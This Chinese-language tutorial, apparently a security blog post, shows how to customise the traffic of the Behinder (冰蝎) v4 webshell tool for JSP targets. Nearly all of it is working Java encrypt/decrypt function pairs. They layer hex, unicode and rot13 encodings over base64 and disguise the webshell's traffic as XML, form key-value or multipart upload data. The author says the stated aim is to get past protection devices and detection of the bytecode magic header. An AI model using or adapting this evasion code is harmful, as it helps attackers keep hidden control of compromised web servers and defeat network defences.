冰蝎v4.0开放了传输协议的自定义功能,使得流量魔改更为简单方便,本文以jsp脚本类型为例,提供一些冰蝎4流量魔改的方式
冰蝎4内置了如下几种传输协议,传输协议可以理解为流量的加密方式
以default_xor传输协议为例,这种传输协议是对原始数据进行了异或加密
效果如下:
我们来去掉加密解密函数的相关代码
如果不用任何加解密函数,request body其实传输的是java 字节码
响应体其实也是明文的固定格式的json类型
{"msg":"执行结果base64编码","status":"c3VjY2Vzcw=="}
冰蝎4将加解密函数给外置出来,我们可以自己定义通信流量的加密方式,本次列举hex、unicode、rot13等加密方式
前面已经分析过传输的data明文数据,所以在它基础上进行base64编码+hex编码,写上加解密函数即可实现hex加密流量
加密函数:
private byte[] Encrypt(byte[] data) throws Exception { String result = java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">"); String str=""; for (int i=0;i<result.length();i++){ int ch = (int)result.charAt(i); String s4 = Integer.toHexString(ch); str = str + s4; } return str.getBytes(); }
解密函数:
private byte[] Decrypt(byte[] data) throws Exception { String s= new String(data); byte[] baKeyword = new byte[s.length()/2]; for(int i = 0; i < baKeyword.length; i++){ try{ baKeyword[i] = (byte)(0xff & Integer.parseInt(s.substring(i*2, i*2+2),16)); }catch(Exception e){ e.printStackTrace(); } } try{ s = new String(baKeyword, "utf-8"); }catch (Exception e1){ e1.printStackTrace(); } byte[] str = java.util.Base64.getDecoder().decode(s.replace("<","+").replace(">","/")); return str; }
通信流量如下:
在base64编码的基础上加一层unicode编码,写unicode编码的加解密函数
加密函数:
private byte[] Encrypt(byte[] data) throws Exception { String result = java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">"); String str=""; StringBuffer unicode = new StringBuffer(); for(int i = 0; i < result.length(); i++){ char c = result.charAt(i); unicode.append("\\u00" + Integer.toHexString(c)); } return unicode.toString().getBytes(); }
解密函数:
private byte[] Decrypt(byte[] data) throws Exception { String unicode= new String(data); StringBuilder sb = new StringBuilder(); int i = -1; int pos = 0; while ((i = unicode.indexOf("\\u", pos)) != -1) { sb.append(unicode.substring(pos, i)); if (i + 5 < unicode.length()) { pos = i + 6; sb.append((char) Integer.parseInt(unicode.substring(i + 2, i + 6), 16)); } } byte[] str = java.util.Base64.getDecoder().decode(sb.toString().replace("<","+").replace(">","/")); return str; }
通信流量如下:
在base64编码的基础上加一层rot13编码,写rot13编码的加解密函数
加密函数:
private byte[] Encrypt(byte[] data) throws Exception { String input = java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">"); String str = ""; for (int i = 0; i < input.length(); i++) { char ch = input.charAt(i); if (ch >= 'A' && ch <= 'Z') { ch = (char) (ch + 13); if (ch > 'Z') { ch = (char)(ch - 26); } } else if (ch >= 'a' && ch <= 'z') { ch = (char)(ch + 13); if (ch > 'z') { ch = (char)(ch - 26); } } str = str + ch; } return str.getBytes(); }
解密函数:
private byte[] Decrypt(byte[] data) throws Exception { String input = new String(data); String str = ""; for (int i = 0; i < input.length(); i++) { char ch = input.charAt(i); if (ch >= 'A' && ch <= 'Z') { ch = (char) (ch + 13); if (ch > 'Z') { ch = (char)(ch - 26); } } else if (ch >= 'a' && ch <= 'z') { ch = (char)(ch + 13); if (ch > 'z') { ch = (char)(ch - 26); } } str = str + ch; } return java.util.Base64.getDecoder().decode(str.replace("<","+").replace(">","/")); }
通信流量如下:
之前列举了一些常见的加密方式,单纯对流量进行加密可能会被检测出来,我们可以对通信流量加入一些业务数据进行混淆,可能会更容易绕过防护设备
将字节码base64编码后的数据替换掉xml模板中指定的字符串就ok了,这样通信流量就变成了xml格式
加密函数:
private byte[] Encrypt(byte[] data) throws Exception { String xml="<?xml version=\"1.0\"?><user><id>1</id><content>DaYer0</content></user>"; xml=xml.replace("DaYer0",java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">")); return xml.getBytes(); }
解密函数:
private byte[] Decrypt(byte[] data) throws Exception { java.io.ByteArrayOutputStream bos=new java.io.ByteArrayOutputStream(); bos.write(data,46,data.length-63); return java.util.Base64.getDecoder().decode(new String(bos.toByteArray()).replace("<","+").replace(">","/")); }
通信流量如下:
当然也可以定义一段key-value的数据,然后用base64编码后的数据替换掉指定字符串
加密函数:
private byte[] Encrypt(byte[] data) throws Exception { String json="id=1&content=DaYer0&token=1452178369&status=00000"; json=json.replace("DaYer0",java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">")); return json.getBytes(); }
解密函数:
private byte[] Decrypt(byte[] data) throws Exception { java.io.ByteArrayOutputStream bos=new java.io.ByteArrayOutputStream(); bos.write(data,13,data.length-43); return java.util.Base64.getDecoder().decode(new String(bos.toByteArray()).replace("<","+").replace(">","/")); }
通信流量如下:
定义一段multipart格式的数据,然后替换指定字符串
加密函数:
private byte[] Encrypt(byte[] data) throws Exception { String upload="-----------------------------7e6103b1815de Content-Disposition:form-data;name=\"uploadFile\";filename=\"test.png\" Content-Type:application/octet-stream DaYer0 -----------------------------7e6103b1815de--"; upload=upload.replace("DaYer0",java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">")); return upload.getBytes(); }
解密函数:
private byte[] Decrypt(byte[] data) throws Exception { java.io.ByteArrayOutputStream bos=new java.io.ByteArrayOutputStream(); bos.write(data,150,data.length-195); return java.util.Base64.getDecoder().decode(new String(bos.toByteArray()).replace("<","+").replace(">","/")); }
通信流量如下:
用变换传输方式的方法可以使通信流量更像业务,但是加密流量只进行了一次base64编码,我们知道原始流量是java字节码,在经过base64编码后会有yv66这样的魔术头,这样很容易被检测到,所以我们可以用加密方式和传输方式相结合的方法来躲避检测
加密流量最外层进行一次rot13编码,然后再用xml的格式进行混淆
加密函数:
private byte[] Encrypt(byte[] data) throws Exception { String xml="<?xml version=\"1.0\"?><user><id>1</id><content>DaYer0</content></user>"; String input = java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">"); String str = ""; for (int i = 0; i < input.length(); i++) { char ch = input.charAt(i); if (ch >= 'A' && ch <= 'Z') { ch = (char) (ch + 13); if (ch > 'Z') { ch = (char)(ch - 26); } } else if (ch >= 'a' && ch <= 'z') { ch = (char)(ch + 13); if (ch > 'z') { ch = (char)(ch - 26); } } str = str + ch; } xml=xml.replace("DaYer0",str); return xml.getBytes(); }
解密函数:
private byte[] Decrypt(byte[] data) throws Exception { java.io.ByteArrayOutputStream bos=new java.io.ByteArrayOutputStream(); bos.write(data,46,data.length-63); String input = new String(bos.toByteArray()); String str = ""; for (int i = 0; i < input.length(); i++) { char ch = input.charAt(i); if (ch >= 'A' && ch <= 'Z') { ch = (char) (ch + 13); if (ch > 'Z') { ch = (char)(ch - 26); } } else if (ch >= 'a' && ch <= 'z') { ch = (char)(ch + 13); if (ch > 'z') { ch = (char)(ch - 26); } } str = str + ch; } return java.util.Base64.getDecoder().decode(str.replace("<","+").replace(">","/")); }
通信流量如下:
加密流量最外层进行一次unicode编码,然后再用key-value的格式进行混淆
加密函数:
private byte[] Encrypt(byte[] data) throws Exception { String content="id=1&content=DaYer0&token=1452178369&status=00000"; String result = java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">"); String str=""; StringBuffer unicode = new StringBuffer(); for(int i = 0; i < result.length(); i++){ char c = result.charAt(i); unicode.append("\\u00" + Integer.toHexString(c)); } content=content.replace("DaYer0",unicode.toString()); return content.getBytes(); }
解密函数:
private byte[] Decrypt(byte[] data) throws Exception { java.io.ByteArrayOutputStream bos=new java.io.ByteArrayOutputStream(); bos.write(data,13,data.length-43); String unicode= new String(bos.toByteArray()); StringBuilder sb = new StringBuilder(); int i = -1; int pos = 0; while ((i = unicode.indexOf("\\u", pos)) != -1) { sb.append(unicode.substring(pos, i)); if (i + 5 < unicode.length()) { pos = i + 6; sb.append((char) Integer.parseInt(unicode.substring(i + 2, i + 6), 16)); } } byte[] str = java.util.Base64.getDecoder().decode(sb.toString().replace("<","+").replace(">","/")); return str; }
通信流量如下:
加密流量最外层进行一次hex编码,然后再用multipart的格式进行混淆
加密函数:
private byte[] Encrypt(byte[] data) throws Exception { String upload="-----------------------------7e6103b1815de Content-Disposition:form-data;name=\"uploadFile\";filename=\"test.png\" Content-Type:application/octet-stream DaYer0 -----------------------------7e6103b1815de--"; String str = ""; String result = java.util.Base64.getEncoder().encodeToString(data).replace("+","<").replace("/",">"); for (int i=0;i<result.length();i++){ int ch = (int)result.charAt(i); String s4 = Integer.toHexString(ch); str = str + s4; } upload=upload.replace("DaYer0",str); return upload.getBytes(); }
解密函数:
private byte[] Decrypt(byte[] data) throws Exception { java.io.ByteArrayOutputStream bos=new java.io.ByteArrayOutputStream(); bos.write(data,150,data.length-195); String s= new String(bos.toByteArray()); byte[] baKeyword = new byte[s.length()/2]; for(int i = 0; i < baKeyword.length; i++){ try{ baKeyword[i] = (byte)(0xff & Integer.parseInt(s.substring(i*2, i*2+2),16)); }catch(Exception e){ e.printStackTrace(); } } try{ s = new String(baKeyword, "utf-8"); }catch (Exception e1){ e1.printStackTrace(); } return java.util.Base64.getDecoder().decode(s.replace("<","+").replace(">","/")); }
通信流量如下:
本文针对冰蝎4流量魔改提供了一些魔改的方式,当然有好的魔改思路也欢迎师傅们分享,最后感谢冰蝎作者rebeyond